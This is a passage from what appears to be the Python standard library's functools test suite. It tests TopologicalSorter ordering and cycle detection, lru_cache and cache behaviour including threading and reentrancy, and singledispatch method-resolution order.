4: [9],
5: [3],
6: [7],
7: [8],
8: [4],
9: []
},
[(9,), (4,), (3, 8), (1, 5, 7), (6,), (2,), (0,)]
)
self._test_graph({
0: [1, 2],
1: [],
2: [3],
3: []
},
[(1, 3), (2,), (0,)]
)
self._test_graph({
0: [1, 2],
1: [],
2: [3],
3: [],
4: [5],
5: [6],
6: []
},
[(1, 3, 6), (2, 5), (0, 4)]
)
def test_no_dependencies(self):
self._test_graph(
{1: {2},
3: {4},
5: {6}},
[(2, 4, 6), (1, 3, 5)]
)
self._test_graph(
{1: set(),
3: set(),
5: set()},
[(1, 3, 5)]
)
def test_the_node_multiple_times(self):
# Test same node multiple times in dependencies
self._test_graph({1: {2}, 3: {4}, 0: [2, 4, 4, 4, 4, 4]},
[(2, 4), (1, 3, 0)])
# Test adding the same dependency multiple times
ts = functools.TopologicalSorter()
ts.add(1, 2)
ts.add(1, 2)
ts.add(1, 2)
self.assertEqual([*ts.static_order()], [2, 1])
def test_graph_with_iterables(self):
dependson = (2*x + 1 for x in range(5))
ts = functools.TopologicalSorter({0: dependson})
self.assertEqual(list(ts.static_order()), [1, 3, 5, 7, 9, 0])
def test_add_dependencies_for_same_node_incrementally(self):
# Test same node multiple times
ts = functools.TopologicalSorter()
ts.add(1, 2)
ts.add(1, 3)
ts.add(1, 4)
ts.add(1, 5)
ts2 = functools.TopologicalSorter({1: {2, 3, 4, 5}})
self.assertEqual([*ts.static_order()], [*ts2.static_order()])
def test_empty(self):
self._test_graph({}, [])
def test_cycle(self):
# Self cycle
self._assert_cycle({1: {1}}, [1, 1])
# Simple cycle
self._assert_cycle({1: {2}, 2: {1}}, [1, 2, 1])
# Indirect cycle
self._assert_cycle({1: {2}, 2: {3}, 3: {1}}, [1, 3, 2, 1])
        # Not all elements are involved in the cycle
self._assert_cycle({1: {2}, 2: {3}, 3: {1}, 5: {4}, 4: {6}}, [1, 3, 2, 1])
# Multiple cycles
self._assert_cycle({1: {2}, 2: {1}, 3: {4}, 4: {5}, 6: {7}, 7: {6}},
[1, 2, 1])
# Cycle in the middle of the graph
self._assert_cycle({1: {2}, 2: {3}, 3: {2, 4}, 4: {5}}, [3, 2])
def test_calls_before_prepare(self):
ts = functools.TopologicalSorter()
with self.assertRaisesRegex(ValueError, r"prepare\(\) must be called first"):
ts.get_ready()
with self.assertRaisesRegex(ValueError, r"prepare\(\) must be called first"):
ts.done(3)
with self.assertRaisesRegex(ValueError, r"prepare\(\) must be called first"):
ts.is_active()
def test_prepare_multiple_times(self):
ts = functools.TopologicalSorter()
ts.prepare()
with self.assertRaisesRegex(ValueError, r"cannot prepare\(\) more than once"):
ts.prepare()
def test_invalid_nodes_in_done(self):
ts = functools.TopologicalSorter()
ts.add(1, 2, 3, 4)
ts.add(2, 3, 4)
ts.prepare()
ts.get_ready()
with self.assertRaisesRegex(ValueError, "node 2 was not passed out"):
ts.done(2)
with self.assertRaisesRegex(ValueError, r"node 24 was not added using add\(\)"):
ts.done(24)
def test_done(self):
ts = functools.TopologicalSorter()
ts.add(1, 2, 3, 4)
ts.add(2, 3)
ts.prepare()
self.assertEqual(ts.get_ready(), (3, 4))
# If we don't mark anything as done, get_ready() returns nothing
self.assertEqual(ts.get_ready(), ())
ts.done(3)
# Now 2 becomes available as 3 is done
self.assertEqual(ts.get_ready(), (2,))
self.assertEqual(ts.get_ready(), ())
ts.done(4)
ts.done(2)
# Only 1 is missing
self.assertEqual(ts.get_ready(), (1,))
self.assertEqual(ts.get_ready(), ())
ts.done(1)
self.assertEqual(ts.get_ready(), ())
self.assertFalse(ts.is_active())
def test_is_active(self):
ts = functools.TopologicalSorter()
ts.add(1, 2)
ts.prepare()
self.assertTrue(ts.is_active())
self.assertEqual(ts.get_ready(), (2,))
self.assertTrue(ts.is_active())
ts.done(2)
self.assertTrue(ts.is_active())
self.assertEqual(ts.get_ready(), (1,))
self.assertTrue(ts.is_active())
ts.done(1)
self.assertFalse(ts.is_active())
def test_not_hashable_nodes(self):
ts = functools.TopologicalSorter()
self.assertRaises(TypeError, ts.add, dict(), 1)
self.assertRaises(TypeError, ts.add, 1, dict())
self.assertRaises(TypeError, ts.add, dict(), dict())
def test_order_of_insertion_does_not_matter_between_groups(self):
def get_groups(ts):
ts.prepare()
while ts.is_active():
nodes = ts.get_ready()
ts.done(*nodes)
yield set(nodes)
ts = functools.TopologicalSorter()
ts.add(3, 2, 1)
ts.add(1, 0)
ts.add(4, 5)
ts.add(6, 7)
ts.add(4, 7)
ts2 = functools.TopologicalSorter()
ts2.add(1, 0)
ts2.add(3, 2, 1)
ts2.add(4, 7)
ts2.add(6, 7)
ts2.add(4, 5)
self.assertEqual(list(get_groups(ts)), list(get_groups(ts2)))
def test_static_order_does_not_change_with_the_hash_seed(self):
def check_order_with_hash_seed(seed):
code = """if 1:
import functools
ts = functools.TopologicalSorter()
ts.add('blech', 'bluch', 'hola')
ts.add('abcd', 'blech', 'bluch', 'a', 'b')
ts.add('a', 'a string', 'something', 'b')
ts.add('bluch', 'hola', 'abcde', 'a', 'b')
print(list(ts.static_order()))
"""
env = os.environ.copy()
# signal to assert_python not to do a copy
# of os.environ on its own
env['__cleanenv'] = True
env['PYTHONHASHSEED'] = str(seed)
out = assert_python_ok('-c', code, **env)
return out
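        # String hashing, and hence set iteration order, changes with
        # PYTHONHASHSEED; static_order() must still produce the same
        # sequence under both seeds.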
run1 = check_order_with_hash_seed(1234)
run2 = check_order_with_hash_seed(31415)
self.assertNotEqual(run1, "")
self.assertNotEqual(run2, "")
self.assertEqual(run1, run2)
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
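    # functools.cache is a thin wrapper equivalent to
    # lru_cache(maxsize=None), which is why the expected CacheInfo
    # below reports maxsize=None.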
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
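        # Only 25 distinct (x, y) pairs exist, so over 1000 random calls
        # hits comfortably outnumber misses and the 20-entry cache ends
        # up full.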
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
            # cache misses occur at the first 7, the first 9, the first 8
            # (which evicts 7), and the final 7 (evicted by then)
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
        # This caused the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
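        # For x == 20 the first call re-enters f(20); the inner call
        # inserts the result, and the outer call must notice that rather
        # than append a second, orphaned link for the same key.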
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
        # LRU cache guarantees that it will call __hash__
        # only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
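        # mock_int multiplies to 15 and hashes to 999; __hash__.call_count
        # below tracks how many times the cache hashed the argument.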
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
        # Test to make sure the LRU cache code isn't thrown off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
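        # Keyword order is part of the cache key, so the two calls below
        # create distinct entries: two misses, zero hits.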
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
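        # A very small switch interval forces frequent thread switches
        # while the n threads fill the cache, exercising its locking.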
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
                # XXX: Why can these be unequal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
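        # Looking up the DoubleEq(2) key compares it to the cached key
        # with __eq__, which re-enters test_func on the same thread; a
        # plain Lock would deadlock there, hence the need for an RLock.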
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
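        # The cache hangs off X.f and is shared by all instances; self is
        # part of the key, and a == b (both X(5)) with equal hashes, so
        # calls through b can hit entries created through a.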
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
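        # Dispatch walks the argument type's MRO: D's MRO is
        # (D, C, B, A, object) and B is the first registered class on it,
        # so D instances use g_B even though A is also registered.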
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
        # Note: in the assert above, g.dispatch(object) is the original
        # undecorated function, not g itself: @singledispatch returns a
        # wrapper around it.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
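        # Each registration below narrows dispatch for whichever sample
        # objects it describes most specifically; by the end the concrete
        # types (dict, list, set, frozenset, tuple) win over the ABCs.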
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
